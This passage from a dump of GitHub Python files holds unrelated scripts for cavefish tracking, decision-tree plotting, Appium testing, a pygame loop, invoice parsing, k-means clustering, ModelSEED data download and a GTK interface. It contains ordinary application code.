self._comp_helper(petri2.rhead_r, -1)\r\n or self._comp_helper(petri2.rhead_c, -1)\r\n or self._comp_helper(petri2.rtail, -1)\r\n or self._comp_helper(petri2.rrod, -1)\r\n ):\r\n r_approach_duration -= 1\r\n right_fish[\"in_time\"] -= 1\r\n right_fish[\"in_facing_right\"] -= 1\r\n\r\n # fish wasn't in radius in previous frame\r\n else:\r\n if self._is_in_radius(petri2, \"r\") == 1:\r\n if self._is_left_facing(petri2, \"r\") == 1:\r\n r_side_buffer = \"left\"\r\n r_approach_duration += 1\r\n right_fish[\"in_time\"] += 1\r\n right_fish[\"in_facing_left\"] += 1\r\n right_in_radius = True\r\n\r\n else:\r\n r_side_buffer = \"right\"\r\n right_fish[\"in_time\"] += 1\r\n right_fish[\"in_facing_right\"] += 1\r\n right_in_radius = True\r\n\r\n else:\r\n right_fish[\"out_time\"] += 1\r\n r_approach_duration = 0\r\n if self._is_left_facing(petri2, \"r\") == 1:\r\n right_fish[\"out_facing_left\"] += 1\r\n else:\r\n right_fish[\"out_facing_right\"] += 1\r\n\r\n if (\r\n self._comp_helper(petri2.rhead_l, -1)\r\n or self._comp_helper(petri2.rhead_r, -1)\r\n or self._comp_helper(petri2.rhead_c, -1)\r\n or self._comp_helper(petri2.rtail, -1)\r\n or self._comp_helper(petri2.rrod, -1)\r\n ):\r\n r_approach_duration -= 1\r\n right_fish[\"in_time\"] -= 1\r\n right_fish[\"right_approach\"] -= 1\r\n right_fish[\"in_facing_right\"] -= 1\r\n\r\n row.append(int(right_in_radius))\r\n row.append(right_fish[\"left_approach\"])\r\n row.append(right_fish[\"right_approach\"])\r\n row.append(\r\n round(right_fish[\"in_time\"] / self.frame_rate, 2))\r\n row.append(\r\n round(right_fish[\"out_time\"] / self.frame_rate, 2))\r\n row.append(\r\n round(right_fish[\"in_facing_left\"] / self.frame_rate, 2))\r\n row.append(\r\n round(right_fish[\"in_facing_right\"] /\r\n self.frame_rate, 2)\r\n )\r\n row.append(\r\n round(right_fish[\"out_facing_left\"] /\r\n self.frame_rate, 2)\r\n )\r\n row.append(\r\n round(right_fish[\"out_facing_right\"] /\r\n self.frame_rate, 2)\r\n )\r\n row.append(petri2.loc[\"rhead_l\"]) # head l\r\n row.append(petri2.loc[\"rhead_r\"]) # head r\r\n row.append(petri2.loc[\"rhead_c\"]) # head c\r\n row.append(petri2.loc[\"rrod\"]) # rod\r\n row.append(petri2.loc[\"r_filled\"])\r\n\r\n else:\r\n row += fill_row\r\n\r\n out_df.loc[df_idx] = row\r\n\r\n l_dist = 0\r\n r_dist = 0\r\n l_pos = None\r\n r_pos = None\r\n\r\n for row_idx in range(out_df.shape[0]):\r\n if row_idx == 0:\r\n l_pos = out_df.loc[row_idx, \"l_center_head\"]\r\n r_pos = out_df.loc[row_idx, \"r_center_head\"]\r\n\r\n else:\r\n tmp = out_df.loc[row_idx, \"l_center_head\"]\r\n l_dist += self._get_distance(l_pos[0],\r\n l_pos[1], tmp[0], tmp[1])\r\n l_pos = tmp.copy()\r\n tmp = out_df.loc[row_idx, \"r_center_head\"]\r\n r_dist += self._get_distance(r_pos[0],\r\n r_pos[1], tmp[0], tmp[1])\r\n r_pos = tmp.copy()\r\n\r\n left_fish[\"distance\"] = l_dist\r\n right_fish[\"distance\"] = r_dist\r\n out_df.to_csv(save_dir + \"backfilled_results.csv\", index=False)\r\n return left_fish, right_fish\r\n\r\n def _roll_mean(self, col):\r\n results = []\r\n assert col.shape[0] > self.window_size + 1\r\n win_range = (self.window_size // 2)\r\n for i in range(col.shape[0]):\r\n # start\r\n if i == 0:\r\n x_coord = np.mean(col[1:i + 1 + win_range, 0])\r\n y_coord = np.mean(col[1:i + 1 + win_range, 1])\r\n results.append([x_coord, y_coord])\r\n\r\n # not start but still too close to start for full backwards sliding window\r\n elif i < win_range:\r\n x_coord = (\r\n np.mean(col[:i, 0]) + np.mean(col[i + 1:i + 1 + win_range, 0])) / 2\r\n y_coord = (\r\n np.mean(col[:i, 1]) + np.mean(col[i + 1:i + 1 + win_range, 1])) / 2\r\n results.append([x_coord, y_coord])\r\n\r\n # end\r\n elif i == col.shape[0] - 1:\r\n x_coord = np.mean(col[i - win_range:, 0])\r\n y_coord = np.mean(col[i - win_range:, 1])\r\n results.append([x_coord, y_coord])\r\n\r\n # not end but too close for full forward sliding window\r\n # need to add +1 here because right side of list slice is exclusive index\r\n elif i + 1 + win_range > col.shape[0] - 1:\r\n x_coord = (np.mean(col[i - win_range:i, 0]\r\n ) + np.mean(col[i + 1:, 0])) / 2\r\n y_coord = (np.mean(col[i - win_range:i, 1]\r\n ) + np.mean(col[i + 1:, 1])) / 2\r\n results.append([x_coord, y_coord])\r\n\r\n else:\r\n x_coord = (np.mean(col[i - win_range:i, 0]) +\r\n np.mean(col[i + 1:i + 1 + win_range, 0])) / 2\r\n y_coord = (np.mean(col[i - win_range:i, 1]) +\r\n np.mean(col[i + 1:i + 1 + win_range, 1])) / 2\r\n results.append([x_coord, y_coord])\r\n\r\n return results\r\n\r\n @staticmethod\r\n def _form_helper(val):\r\n val = re.sub(r'[\\s\\[\\]]', '', val)\r\n return val\r\n\r\n def _form_str_cell(self, val):\r\n assert type(val) == str\r\n\r\n if len(val.split(',')) > 1:\r\n tmp = val.split(',')\r\n return np.array([float(self._form_helper(tmp[0])), float(self._form_helper(tmp[1]))])\r\n\r\n else:\r\n form_val = []\r\n tmp = val.split(' ')\r\n for v in tmp:\r\n try:\r\n form_val.append(float(self._form_helper(v)))\r\n except ValueError:\r\n pass\r\n assert len(form_val) == 2\r\n\r\n return np.array(form_val)\r\n\r\n def _convert_source_df(self, in_df):\r\n out_cols = {\"frame_idx\": 'frame_idx',\r\n \"l_filled\": 'l_coords_filled',\r\n \"lhead_l\": 'l_left_head',\r\n \"lhead_r\": 'l_right_head',\r\n \"lhead_c\": 'l_center_head',\r\n \"ltail\": None,\r\n \"lrod\": 'l_rod',\r\n \"r_filled\": 'r_coords_filled',\r\n \"rhead_l\": 'r_left_head',\r\n \"rhead_r\": 'r_right_head',\r\n \"rhead_c\": 'r_center_head',\r\n \"rtail\": None,\r\n \"rrod\": 'r_rod'}\r\n\r\n # initialize dictionary holding values for out df\r\n out_dict = {}\r\n for col in out_cols.keys():\r\n # tail coordinates are irrelevant\r\n if 'tail' in col:\r\n out_dict[col] = [[0, 0]] * in_df.shape[0]\r\n\r\n # these columns can be copied directly\r\n elif col in ['frame_idx', 'l_filled', 'r_filled']:\r\n out_dict[col] = in_df[out_cols[col]].tolist()\r\n\r\n # everything else needs to be filled in\r\n else:\r\n # might need to work with legacy pandas version, can't call .to_numpy()\r\n col_array = np.array([self._form_str_cell(item)\r\n for item in in_df[out_cols[col]].tolist()])\r\n out_dict[col] = self._roll_mean(col_array)\r\n\r\n return pd.DataFrame.from_dict(out_dict)\r\n\r\n def _add_to_summary_file(self, left_dict, right_dict, fname):\r\n lrow = {\r\n \"Subject\": f\"{fname}_left\",\r\n \"Duration in radius - left-facing\": left_dict[\"in_facing_left\"]\r\n / self.frame_rate,\r\n \"Duration in radius - right-facing\": left_dict[\"in_facing_right\"]\r\n / self.frame_rate,\r\n \"Duration outside radius - left-facing\": left_dict[\"out_facing_left\"]\r\n / self.frame_rate,\r\n \"Duration outside radius - right-facing\": left_dict[\"out_facing_right\"]\r\n / self.frame_rate,\r\n \"Left approaches\": left_dict[\"left_approach\"],\r\n \"Right approaches\": left_dict[\"right_approach\"],\r\n \"Distance traveled (mm)\": left_dict[\"distance\"],\r\n }\r\n\r\n rrow = {\r\n \"Subject\": f\"{fname}_right\",\r\n \"Duration in radius - left-facing\": right_dict[\"in_facing_left\"]\r\n / self.frame_rate,\r\n \"Duration in radius - right-facing\": right_dict[\"in_facing_right\"]\r\n / self.frame_rate,\r\n \"Duration outside radius - left-facing\": right_dict[\"out_facing_left\"]\r\n / self.frame_rate,\r\n \"Duration outside radius - right-facing\": right_dict[\"out_facing_right\"]\r\n / self.frame_rate,\r\n \"Left approaches\": right_dict[\"left_approach\"],\r\n \"Right approaches\": right_dict[\"right_approach\"],\r\n \"Distance traveled (mm)\": right_dict[\"distance\"],\r\n }\r\n\r\n self.sum_file = self.sum_file.append([lrow, rrow], ignore_index=True)\r\n\r\n def analyze_video(self, result_dir):\r\n vid_name = result_dir.split('/')[-2]\r\n if self.frame_file is not None and vid_name not in self.frame_snips.keys():\r\n print(f'Skipped video: {vid_name}')\r\n\r\n else:\r\n src_df = pd.read_csv(result_dir + 'approach_results.csv')\r\n conv_df = self._convert_source_df(src_df)\r\n left_results, right_results = self._get_metrics(\r\n conv_df, result_dir)\r\n\r\n self._add_to_summary_file(\r\n left_results,\r\n right_results,\r\n vid_name,\r\n )\r\n\r\n print(f'Done: {result_dir}')\r\n\r\n\r\nif __name__ == \"__main__\":\r\n parser = argparse.ArgumentParser(\r\n description=\"Backfill& reanalyze cavefish results.\")\r\n\r\n parser.add_argument(\"approach_radius\",\r\n type=int,\r\n help=\"Radius around rod that will be considered as an approach if crossed (in mm).\")\r\n\r\n parser.add_argument(\"--result_folder\",\r\n \"-r\",\r\n type=str,\r\n required=True,\r\n default=None,\r\n help=\"Folder containing results from previously analyzed videos.\")\r\n\r\n parser.add_argument(\"--frame_rate\",\r\n \"-f\",\r\n type=int,\r\n required=False,\r\n default=10,\r\n help=\"Frame rate at which videos were recorded. Default is 10.\")\r\n\r\n parser.add_argument(\"--frame_file\",\r\n \"-x\",\r\n type=str,\r\n required=False,\r\n default=None,\r\n help=\"File containing subsections of videos to analyze.\")\r\n\r\n parser.add_argument(\"--window_size\",\r\n \"-w\",\r\n type=int,\r\n required=False,\r\n default=10,\r\n help=\"Rolling window size for filling coordinates. Default is 10.\")\r\n\r\n parser.add_argument(\"--ratio_pixmm\",\r\n \"-r\",\r\n type=float,\r\n required=True,\r\n default=5.287,\r\n help=\"Pixel to millimeter ratio (px/mm).\")\r\n\r\n parser.add_argument(\"--dims_x\",\r\n \"-d\",\r\n type=int,\r\n required=True,\r\n default=1280,\r\n help=\"Original video x-dimensionality in pixels.\")\r\n\r\n usr_args = vars(parser.parse_args())\r\n\r\n filler = BackFiller(**usr_args)\r\n\r\n for vid_path in [f for f in os.listdir(usr_args[\"result_folder\"])]:\r\n if usr_args[\"result_folder\"].endswith(\"/\") or usr_args[\"result_folder\"].endswith(\"\\\\\"):\r\n if os.path.isdir(usr_args[\"result_folder\"][:-1] + \"/\" + vid_path + \"/\"):\r\n filler.analyze_video(\r\n usr_args[\"result_folder\"][:-1] + \"/\" + vid_path + \"/\")\r\n\r\n else:\r\n if os.path.isdir(usr_args[\"result_folder\"][:-1] + \"/\" + vid_path + \"/\"):\r\n filler.analyze_video(\r\n usr_args[\"result_folder\"] + \"/\" + vid_path + \"/\")\r\n\r\n if usr_args[\"result_folder\"].endswith(\"\\\\\") or usr_args[\"result_folder\"].endswith(\"/\"):\r\n filler.sum_file.to_csv(\r\n usr_args[\"result_folder\"] + \"roll_avg_summary_results.csv\", index=False)\r\n\r\n else:\r\n filler.sum_file.to_csv(\r\n usr_args[\"result_folder\"] + \"/roll_avg_summary_results.csv\", index=False)\r\n","repo_name":"Nick-AI/FishProject","sub_path":"slwindow.py","file_name":"slwindow.py","file_ext":"py","file_size_in_byte":25709,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"6050590982","text":"from matplotlib import pyplot as plt\nimport os\nfrom sklearn import tree\n\n\nclass Plotter:\n def __init__(self, config):\n self.config = config\n self.plot_dir = config[\"directory\"]\n self.plot_name = \"decision_tree\"\n\n def plot_tree(self, model, feature_names, target_names):\n fig = plt.figure(figsize=(10, 10))\n tree.plot_tree(model, feature_names=feature_names,\n class_names=target_names, filled=True, impurity=True, node_ids=False, proportion=False,\n rounded=True, precision=2)\n plot_file = os.path.join(self.plot_dir, self.plot_name + '.png')\n fig.savefig(plot_file, transparent=False, dpi=300, bbox_inches='tight')\n plt.show()\n","repo_name":"phmelzer/decision-tree-sklearn","sub_path":"src/plot.py","file_name":"plot.py","file_ext":"py","file_size_in_byte":732,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"26441046530","text":"from appium.webdriver.common.appiumby import By\nfrom time import sleep, time\n\n\nclass Page:\n \"\"\"\n base class for POM mobile testing\n \"\"\"\n webdriver = None\n driver = None\n\n TIMEOUT = 5\n STEPTIME = .5\n\n def __init__(self, driver) -> None:\n self.webdriver = driver\n self.driver = driver.driver\n\n def attribute(self, elem, attrib):\n return elem.get_attribute(attrib)\n\n def sleep(self, timing=None):\n timing_ = .05 if timing is None else timing\n sleep(timing_)\n\n def selectElement(self, elements: list, pattern: dict):\n for element in elements:\n for key in pattern.keys():\n attr = self.attribute(element, key)\n if attr is not None:\n if attr.lower() in pattern[key]:\n return element\n\n def fill(self, text: str, input: object = None, xpath: str = None):\n\n try:\n input.click()\n self.sleep()\n input.send_keys(text)\n self.driver.hide_keyboard()\n except:\n Exception(f'Не удалось заполнить поле {input}')","repo_name":"Asidrus/autotest_mobile","sub_path":"pages/page.py","file_name":"page.py","file_ext":"py","file_size_in_byte":1143,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"20423303958","text":"# -*- coding: utf-8 -*-\n\nimport pygame\nimport os\nimport g\nimport widgets\nimport scenes.squirrelton\nimport settings\n\ndef loop():\n\t\"\"\"\n\tThis is the game's main loop and it does the following:\n\t- runs every function in g.pending_actions list and remove it from the list if it returns anything.\n\t- blit the background of menu and main frame\n\t- run the on_loop function and blit the image or animation of every item in g.scene.menu\n\t- run the on_loop function and blit the image or animation of every item in main (main is hardcoded)\n\t- run functions on the following events:\n\t\t- chars begin entrance\n\t\t- chars entering\n\t\t- chars on center\n\t\t- chars begin leaving\n\t\t- chars leaving\n\t- blit messages on their positions\n\t- blit it all on the screen\n\t- blit the balloons on the screen\n\n\tPlease, update the description on every change\n\t\"\"\"\n\tg.milliseconds += g.clock.tick()\n\tif g.milliseconds > settings.fps:\n\t\tg.milliseconds = 0\n\n\t#Runs the main loop\n\t#a pending action only returns true if it should no longer be executed\n\tfor i in g.pending_actions:\n\t\tdone = i()\n\t\tif done:\n\t\t\tg.pending_actions.remove(i)\n\t#reset the frames\n\tg.text_frame.blit(g.text_background, (0,0))\n\tg.menu_frame.blit(g.menu_background, (0,0))\n\t\t\n\t#run the menu items\n\tfor i in g.scene.menu:\n\t\ti.on_loop()\n\t\tif i.__class__ == widgets.Button:\n\t\t\tg.menu_frame.blit(i.background, i.pos,(i.area[i.status],(264,66)))\n\t\tg.menu_frame.blit(i.image,i.pos)\n\t#run items in main frame\n\tfor i in (g.next_scene, g.scene):\n\t\tif i and i.place:\n\t\t\ti.place.on_loop()\n\t\t\tg.main_frame.blit(i.place.animation, i.place.pos, ((i.place.step,0), i.place.size))\n\tfor i in (g.PC, g.foe):\n\t\tif i:\n\t\t\ti.on_loop()\n\t\t\tg.main_frame.blit(i.animation, i.pos,((i.step,0),i.size))\n\tfor i in (g.PC, g.foe):\n\t\tif i and i.chosen_bobot:\n\t\t\ti.chosen_bobot.on_loop()\n\t\t\tg.main_frame.blit(i.chosen_bobot.animation, i.chosen_bobot.pos,(i.chosen_bobot.step, i.chosen_bobot.size))\n\tif g.panel:\n\t\tpanel=g.panel\n\t\tpanel.on_loop()\n\t\tg.main_frame.blit(panel.image, panel.pos)\n\n\tif g.PC:\n\t\tg.menu_frame.blit(g.PC.status, (10,10))\n\t\tif g.PC.pos[0]<=-100 and g.PC.side == 'left':\n\t\t\tg.scene.on_start_enter()\n\t\telif g.PC.pos[0] > -100 and g.PC.animation == g.PC.walk:\n\t\t\tg.scene.on_entering()\n\t\telif g.on_center:\n\t\t\tg.scene.on_center()\n\t\telif g.PC.pos[0] < 180 and g.PC.animation == g.PC.walk:\n\t\t\tg.scene.on_start_leave()\n\n\tg.board.on_loop()\n\tfor (p,i) in zip(g.slots, [i for sub in g.board.messages for i in sub] ):\n\t\tg.text_frame.blit(i,(35,p))\n\t\n\tg.screen.blit(g.main_frame,g.main_pos)\n\tg.screen.blit(g.text_frame,g.text_pos)\n\tg.screen.blit(g.menu_frame,g.menu_pos)\n\tif g.board.side == 'none':\n\t\tboard_pos = (20,355)\n\telse:\n\t\tboard_pos = (20,265)\n\tg.screen.blit(g.board.balloons[g.board.side], board_pos)\n\tfor i in g.board.headline:\n\t\tg.screen.blit(i, (30, 360)) \n\ndef teste():\n\tpass\n\ndef speak_on_center(char, line):\n\tif (180 > char.pos[0] > 169 and char.side == 'left') \\\n\tor (320 > self.pos[0] > 301 and self.side == 'right'):\n\t\tg.board.new_message(line)\n\n\t\n","repo_name":"ocastudios/bobots","sub_path":"game.py","file_name":"game.py","file_ext":"py","file_size_in_byte":2974,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"9294768580","text":"#solution 1\n#secret_name = 9\n\n#for i in range(3):\n# shot = input('Guess: ')\n# if secret_name == int(shot):\n# print('You win!')\n# break\n# elif secret_name != int(shot):\n# i += 1\n#if i >= 3:\n# print('You lose!')\n\n# solution 2\nsecret_number = 9\nguessing_number = 0 \nguessing_limit = 3\nwhile guessing_number < guessing_limit:\n guess = int(input('Guess: '))\n guessing_number += 1\n if guess == secret_number:\n print('you won!')\n \n break\nelse:\n print(\"you have faild!\")","repo_name":"Usserski/starting_python","sub_path":"Learning Basic/guessing_game.py","file_name":"guessing_game.py","file_ext":"py","file_size_in_byte":497,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"40596988614","text":"\"\"\"\nThis module abstracts templates for invoice providers.\n\nTemplates are initially read from .yml files and then kept as class.\n\"\"\"\n\nimport yaml\nimport os\nimport re\nimport dateparser\nfrom unidecode import unidecode\nimport logging as logger\nfrom collections import OrderedDict\n\nfrom invoice2data.utils import ordered_load\n\nOPTIONS_DEFAULT = {\n 'remove_whitespace': False,\n 'remove_accents': False,\n 'lowercase': False,\n 'currency': 'EUR',\n 'date_formats': [],\n 'languages': [],\n 'decimal_separator': '.',\n 'replace': [], # example: see templates/fr/fr.free.mobile.yml\n 'field_separator': r'\\s+',\n 'line_separator': r'\\n',\n}\n\ndef read_templates(folder):\n \"\"\"\n Load yaml templates from template folder. Return list of dicts.\n \"\"\"\n output = []\n for path, subdirs, files in os.walk(folder):\n for name in sorted(files):\n if name.endswith('.yml'):\n tpl = ordered_load(open(os.path.join(path, name)).read())\n tpl['template_name'] = name\n\n # Test if all required fields are in template:\n assert 'keywords' in tpl.keys(), 'Missing keywords field.'\n required_fields = ['date', 'amount', 'invoice_number']\n assert len(set(required_fields).intersection(tpl['fields'].keys())) == len(required_fields), \\\n 'Missing required key in template {} {}. Found {}'.format(name, path, tpl['fields'].keys())\n\n # Keywords as list, if only one.\n if type(tpl['keywords']) is not list:\n tpl['keywords'] = [tpl['keywords']]\n\n if 'lines' in tpl:\n assert 'start' in tpl['lines'], 'Lines start regex missing'\n assert 'end' in tpl['lines'], 'Lines end regex missing'\n assert 'line' in tpl['lines'], 'Line regex missing'\n\n output.append(InvoiceTemplate(tpl))\n return output\n\n\nclass InvoiceTemplate(OrderedDict):\n \"\"\"\n Represents single template files that live as .yml files on the disk.\n \"\"\"\n\n def __init__(self, *args, **kwargs):\n super(InvoiceTemplate, self).__init__(*args, **kwargs)\n\n # Merge template-specific options with defaults\n self.options = OPTIONS_DEFAULT.copy()\n\n for lang in self.options['languages']:\n assert len(lang) == 2, 'lang code must have 2 letters'\n\n if 'options' in self:\n self.options.update(self['options'])\n\n # Set issuer, if it doesn't exist.\n if 'issuer' not in self.keys():\n self['issuer'] = self['keywords'][0]\n\n def prepare_input(self, extracted_str):\n \"\"\"\n Input raw string and do transformations, as set in template file.\n \"\"\"\n\n # Remove withspace\n if self.options['remove_whitespace']:\n optimized_str = re.sub(' +', '', extracted_str)\n else:\n optimized_str = extracted_str\n\n # Remove accents\n if self.options['remove_accents']:\n optimized_str = unidecode(optimized_str)\n\n # convert to lower case\n if self.options['lowercase']:\n optimized_str = optimized_str.lower()\n\n # specific replace\n for replace in self.options['replace']:\n assert len(replace) == 2, 'A replace should be a list of 2 items'\n optimized_str = optimized_str.replace(replace[0], replace[1])\n\n return optimized_str\n\n def matches_input(self, optimized_str):\n \"\"\"See if string matches keywords set in template file\"\"\"\n\n if all([keyword in optimized_str for keyword in self['keywords']]):\n logger.debug('Matched template %s', self['template_name'])\n return True\n\n def parse_number(self, value):\n assert value.count(self.options['decimal_separator']) < 2,\\\n 'Decimal separator cannot be present several times'\n # replace decimal separator by a |\n amount_pipe = value.replace(self.options['decimal_separator'], '|')\n # remove all possible thousands separators\n amount_pipe_no_thousand_sep = re.sub(\n '[.,\\s]', '', amount_pipe)\n # put dot as decimal sep\n return float(amount_pipe_no_thousand_sep.replace('|', '.'))\n\n def parse_date(self, value):\n res = dateparser.parse(\n value, date_formats=self.options['date_formats'],\n languages=self.options['languages'])\n logger.debug(\"result of date parsing=%s\", res)\n return res\n\n def coerce_type(self, value, target_type):\n if target_type == 'int':\n if not value.strip():\n return 0\n return int(self.parse_number(value))\n elif target_type == 'float':\n if not value.strip():\n return 0.0\n return float(self.parse_number(value))\n elif target_type == 'date':\n return self.parse_date(value)\n assert False, 'Unknown type'\n\n def extract(self, optimized_str):\n \"\"\"\n Given a template file and a string, extract matching data fields.\n \"\"\"\n\n logger.debug('START optimized_str ========================')\n logger.debug(optimized_str)\n logger.debug('END optimized_str ==========================')\n logger.debug(\n 'Date parsing: languages=%s date_formats=%s',\n self.options['languages'], self.options['date_formats'])\n logger.debug('Float parsing: decimal separator=%s', self.options['decimal_separator'])\n logger.debug(\"keywords=%s\", self['keywords'])\n logger.debug(self.options)\n\n # Try to find data for each field.\n output = {}\n output['issuer'] = self['issuer']\n \n for k, v in self['fields'].items():\n if k.startswith('static_'):\n logger.debug(\"field=%s | static value=%s\", k, v)\n output[k.replace('static_', '')] = v\n else:\n logger.debug(\"field=%s | regexp=%s\", k, v)\n\n # Fields can have multiple expressions\n if type(v) is list:\n for v_option in v:\n res_find = re.findall(v_option, optimized_str)\n if res_find:\n break\n else:\n res_find = re.findall(v, optimized_str)\n if res_find:\n logger.debug(\"res_find=%s\", res_find)\n if k.startswith('date') or k.endswith('date'):\n output[k] = self.parse_date(res_find[0])\n if not output[k]:\n logger.error(\n \"Date parsing failed on date '%s'\", raw_date)\n return None\n elif k.startswith('amount'):\n output[k] = self.parse_number(res_find[0])\n else:\n output[k] = res_find[0]\n else:\n logger.warning(\"regexp for field %s didn't match\", k)\n\n if 'lines' in self:\n self.extract_lines(optimized_str, output)\n\n output['currency'] = self.options['currency']\n\n if len(output.keys()) >= 5:\n output['desc'] = 'Invoice %s from %s' % (\n output['invoice_number'], self['issuer'])\n logger.debug(output)\n return output\n else:\n logger.error(output)\n return None\n\n def extract_lines(self, content, output):\n \"\"\"Try to extract lines from the invoice\"\"\"\n start = re.search(self['lines']['start'], content)\n end = re.search(self['lines']['end'], content)\n if not start or not end:\n logger.warning('no lines found - start %s, end %s', start, end)\n return\n content = content[start.end():end.start()]\n lines = []\n current_row = {}\n if 'first_line' not in self['lines'] and\\\n 'last_line' not in self['lines']:\n self['lines']['first_line'] = self['lines']['line']\n for line in re.split(self.options['line_separator'], content):\n # if the line has empty lines in it , skip them\n if not line.strip('').strip('\\n') or not line:\n continue\n if 'first_line' in self['lines']:\n match = re.search(self['lines']['first_line'], line)\n if match:\n if 'last_line' not in self['lines']:\n if current_row:\n lines.append(current_row)\n current_row = {}\n if current_row:\n lines.append(current_row)\n current_row = {\n field: value.strip() if value else ''\n for field, value in match.groupdict().items()\n }\n continue\n if 'last_line' in self['lines']:\n match = re.search(self['lines']['last_line'], line)\n if match:\n for field, value in match.groupdict().items():\n current_row[field] = '%s%s%s' % (\n current_row.get(field, ''),\n current_row.get(field, '') and '\\n' or '',\n value.strip() if value else ''\n )\n if current_row:\n lines.append(current_row)\n current_row = {}\n continue\n match = re.search(self['lines']['line'], line)\n if match:\n for field, value in match.groupdict().items():\n current_row[field] = '%s%s%s' % (\n current_row.get(field, ''),\n current_row.get(field, '') and '\\n' or '',\n value.strip() if value else ''\n )\n continue\n logger.debug(\n 'ignoring *%s* because it doesn\\'t match anything', line\n )\n if current_row:\n lines.append(current_row)\n\n types = self['lines'].get('types', [])\n for row in lines:\n for name in row.keys():\n if name in types:\n row[name] = self.coerce_type(row[name], types[name])\n\n if lines:\n output['lines'] = lines\n","repo_name":"dhanya1/Automation-with-Pyautogui","sub_path":"invoices/invoice2data/invoice2data/template.py","file_name":"template.py","file_ext":"py","file_size_in_byte":10426,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"37060117366","text":"#!/usr/bin/env python3\n\"\"\"Contains the function kmeans()\"\"\"\n\nimport numpy as np\n\n\ndef kmeans(X, k, iterations=1000):\n \"\"\"Performs K-means on a dataset\n\n Args:\n X (ndarray)(n,d): contains dataset\n n: no. data points\n d: no. dimensions for each data point\n k (int): positive int containing no. clusters\n iterations (int): number of iterations that should be performed\n\n Returns:\n C, clss\n C (ndarray)(k,d): contains the centroid means for each cluster\n clss (ndarray)(n,): contains index of the cluster C that each data\n point belongs to\n None, None if failure\n \"\"\"\n if type(X) is not np.ndarray or len(X.shape) != 2:\n return None, None\n if type(k) is not int or k <= 0 or k > X.shape[0]:\n return None, None\n if type(iterations) is not int or iterations <= 0:\n return None, None\n\n n, d = X.shape\n\n low = np.min(X, axis=0)\n high = np.max(X, axis=0)\n centroids = np.random.uniform(low=low, high=high, size=(k, d))\n\n for i in range(iterations):\n distances = np.sqrt(((X - centroids[:, np.newaxis])**2).sum(axis=2))\n clss = np.argmin(distances, axis=0)\n prev = centroids.copy()\n for j in range(k):\n if len(X[j == clss]) == 0:\n centroids[j] = np.random.uniform(low=np.min(X, axis=0),\n high=np.max(X, axis=0),\n size=(1, d))\n else:\n centroids[j] = np.mean(X[j == clss], axis=0)\n if np.array_equal(prev, centroids):\n break\n\n distances = np.sqrt(((X - centroids[:, np.newaxis])**2).sum(axis=2))\n clss = np.argmin(distances, axis=0)\n\n return centroids, clss\n","repo_name":"kyle-gross/holbertonschool-machine_learning","sub_path":"unsupervised_learning/0x01-clustering/1-kmeans.py","file_name":"1-kmeans.py","file_ext":"py","file_size_in_byte":1800,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"17003571581","text":"#!/usr/bin/env python\nfrom urllib.request import urlopen\nimport sys,json\n\nMSD_git_url = \"https://raw.githubusercontent.com/ModelSEED/ModelSEEDDatabase/\"\nMSD_commit = \"v1.0\"\n\n##\n## Compounds\n##\nfile = urlopen(MSD_git_url+MSD_commit+\"/Biochemistry/Structures/Unique_ModelSEED_Structures.txt\")\ninchi_structures=dict()\ninchikey_structures=dict()\n\nfor line in file.readlines():\n line=line.decode('utf-8')\n line=line.strip('\\n')\n array=line.split('\\t')\n if(array[1] == 'InChI'):\n inchi_structures[array[0]]=array[5]\n if(array[1] == 'InChIKey'):\n inchikey_structures[array[0]]=array[5]\n \nwith open('Compound_Structures.json','w') as inchi_file:\n inchi_file.write(json.dumps(inchi_structures))\n\nwith open('Inchikey_IDs.json','w') as inchikey_file:\n inchikey_file.write(json.dumps(inchikey_structures))\n","repo_name":"kbaseapps/CompoundSetUtils","sub_path":"data/Fetch_Updated_Data_from_ModelSEED.py","file_name":"Fetch_Updated_Data_from_ModelSEED.py","file_ext":"py","file_size_in_byte":836,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"37438638090","text":"import gi\n\ngi.require_version('Gtk', '3.0')\nfrom gi.repository import Gtk\n\nclass MyApp(Gtk.Window):\n\n def __init__(self):\n super().__init__(title=\"Multi-page Application\")\n self.set_default_size(1000, 800)\n\n # Create navigation bar\n self.navbar = Gtk.Box(spacing=10)\n self.back_button = Gtk.Button(label=\"Back\")\n self.back_button.set_sensitive(False)\n self.back_button.connect(\"clicked\", self.on_back_clicked)\n self.next_button = Gtk.Button(label=\"Next\")\n self.next_button.connect(\"clicked\", self.on_next_clicked)\n self.navbar.pack_start(self.back_button, False, True, 0)\n self.navbar.pack_end(self.next_button, False, True, 0)\n\n # Create stack for pages\n self.stack = Gtk.Stack()\n self.current_page = 1\n\n # Create page 1\n page1 = Gtk.Box(orientation=Gtk.Orientation.VERTICAL, spacing=10)\n label1 = Gtk.Label(label=\"Page 1\")\n label1.set_halign(Gtk.Align.CENTER)\n confirm_button = Gtk.Button(label=\"Confirm\")\n confirm_button.connect(\"clicked\", self.on_confirm_clicked)\n page1.pack_start(label1, True, True, 0)\n page1.pack_start(confirm_button, True, True, 0)\n self.stack.add_named(page1, \"page1\")\n\n # Create page 2\n page2 = Gtk.Box(orientation=Gtk.Orientation.VERTICAL, spacing=10)\n label2 = Gtk.Label(label=\"Page 2\")\n label2.set_halign(Gtk.Align.CENTER)\n done_button = Gtk.Button(label=\"Done\")\n done_button.connect(\"clicked\", Gtk.main_quit)\n page2.pack_start(label2, True, True, 0)\n page2.pack_start(done_button, True, True, 0)\n self.stack.add_named(page2, \"page2\")\n\n # Add stack and navbar to window\n vbox = Gtk.Box(orientation=Gtk.Orientation.VERTICAL, spacing=10)\n vbox.pack_start(self.navbar, False, True, 0)\n vbox.pack_start(self.stack, True, True, 0)\n self.add(vbox)\n\n # Show initial page\n self.stack.set_visible_child_name(f\"page{self.current_page}\")\n\n def on_back_clicked(self, button):\n if self.current_page > 1:\n self.current_page -= 1\n self.stack.set_visible_child_name(f\"page{self.current_page}\")\n 